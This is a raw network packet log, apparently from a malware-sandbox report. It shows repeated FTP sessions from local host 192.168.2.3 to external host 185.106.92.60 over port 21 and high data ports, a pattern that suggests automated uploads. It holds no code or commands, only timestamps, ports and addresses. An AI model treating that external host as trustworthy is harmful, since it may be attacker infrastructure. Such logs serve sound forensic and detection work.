                                                                                                                                    Oct 10, 2022 06:03:44.239948034 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.240089893 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.240253925 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.270620108 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.270775080 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.271167040 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.298917055 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.299040079 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.301035881 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.327404022 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.327557087 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.330339909 CEST5004264715192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.355564117 CEST6471550042185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.355710030 CEST5004264715192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.356345892 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.385329962 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.385504007 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.385948896 CEST5004264715192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.409465075 CEST6471550042185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.409831047 CEST6471550042185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.409913063 CEST5004264715192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.410743952 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.410949945 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.413516045 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.439282894 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.440011978 CEST2150041185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.440126896 CEST5004121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.584012032 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.610472918 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.610655069 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.638684988 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.638731003 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.638761997 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.638942003 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.639069080 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.639224052 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.665586948 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.665939093 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.666117907 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.693191051 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.693335056 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.693491936 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.719366074 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.722399950 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.722590923 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.748269081 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.748603106 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.749228001 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.774207115 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.774983883 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.776813030 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.801639080 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.801769018 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.801975965 CEST5004464716192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.826785088 CEST6471650044185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.826984882 CEST5004464716192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.827370882 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.854540110 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.858520031 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.859400034 CEST5004464716192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.885061979 CEST6471650044185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.885099888 CEST6471650044185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.885282993 CEST5004464716192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.885628939 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.886408091 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.886646986 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:44.912662983 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.912765026 CEST2150043185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:44.912899971 CEST5004321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.035221100 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.058140993 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.058294058 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.084119081 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.084616899 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.084719896 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.084877968 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.084877968 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.088680029 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.111443996 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.113615990 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.115104914 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.137898922 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.138320923 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.138417006 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.213414907 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.231483936 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.231638908 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.231915951 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.254929066 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.255183935 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.256057978 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.278657913 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.278964996 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.280982018 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.304114103 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.304681063 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.304955006 CEST5004664717192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.327481985 CEST6471750046185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.330524921 CEST5004664717192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.333816051 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.356812954 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.358506918 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.358999968 CEST5004664717192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.381403923 CEST6471750046185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.381459951 CEST6471750046185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.381647110 CEST5004664717192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.381943941 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.382021904 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.382193089 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.404489994 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.404546976 CEST2150045185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.404747963 CEST5004521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.509471893 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.534414053 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.537791014 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.565314054 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.565380096 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.565417051 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.565551043 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.565598011 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.567188025 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.592593908 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.592850924 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.593204021 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.618135929 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.620646000 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.620781898 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.645576954 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.646188974 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.646318913 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.671644926 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.671804905 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.672451019 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.696194887 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.696522951 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.698184967 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.721636057 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.722112894 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.722800970 CEST5004864718192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.745626926 CEST6471850048185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.745879889 CEST5004864718192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.746273041 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.771336079 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.771460056 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.771964073 CEST5004864718192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.794509888 CEST6471850048185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.794569969 CEST6471850048185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.795171022 CEST5004864718192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.795238972 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.795409918 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.795576096 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.819618940 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.819727898 CEST2150047185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.820059061 CEST5004721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.933227062 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.958781958 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.959121943 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.988490105 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.988542080 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.988603115 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:45.988835096 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.988836050 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.988836050 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:45.988924980 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.013303041 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.013624907 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.013700962 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.038439035 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.038723946 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.038836002 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.062947989 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.063152075 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.063539982 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.089870930 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.090133905 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.092803001 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.117150068 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.117398977 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.118477106 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.144226074 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.144459963 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.145361900 CEST5005064719192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.167937994 CEST6471950050185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.168159008 CEST5005064719192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.168512106 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.196412086 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.196536064 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.197027922 CEST5005064719192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.219415903 CEST6471950050185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.219577074 CEST6471950050185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.219644070 CEST5005064719192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.220057011 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.220134020 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.220268011 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.244678974 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.244745016 CEST2150049185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.244925976 CEST5004921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.350629091 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.373851061 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.374171019 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.400814056 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.400867939 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.401017904 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.401139975 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.401139975 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.401447058 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.424583912 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.424799919 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.430162907 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.453761101 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.453953981 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.454081059 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.477193117 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.477386951 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.477575064 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.500986099 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.501254082 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.501653910 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.524890900 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.525162935 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.533862114 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.557859898 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.558134079 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.558526993 CEST5005264720192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.585119009 CEST6472050052185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.585396051 CEST5005264720192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.585663080 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.611516953 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.611608028 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.612605095 CEST5005264720192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.638716936 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.638830900 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.639090061 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.640738964 CEST6472050052185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.640981913 CEST6472050052185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.641089916 CEST5005264720192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.661995888 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.662072897 CEST2150051185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.662162066 CEST5005121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.794603109 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.817715883 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.817863941 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.844188929 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.844243050 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.844276905 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.844404936 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.845449924 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.868557930 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.868736982 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.876368046 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.899535894 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.900010109 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.900010109 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.924875021 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.925004005 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.925158024 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.948704004 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.948784113 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.949384928 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.972186089 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.972428083 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.974683046 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.998035908 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:46.998141050 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:46.999810934 CEST5005464722192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.022912025 CEST6472250054185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.023058891 CEST5005464722192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.023335934 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.046639919 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.046765089 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.049232960 CEST5005464722192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.071825027 CEST6472250054185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.071875095 CEST6472250054185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.071930885 CEST5005464722192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.072417021 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.072508097 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.075997114 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.098850965 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.098948002 CEST2150053185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.099096060 CEST5005321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.262481928 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.287096024 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.287270069 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.314483881 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.314538956 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.314623117 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.314623117 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.314701080 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.314765930 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.314903021 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.339221954 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.339324951 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.339453936 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.365014076 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.365138054 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.365274906 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.390166998 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.390286922 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.390599966 CEST5005521192.168.2.3185.106.92.60
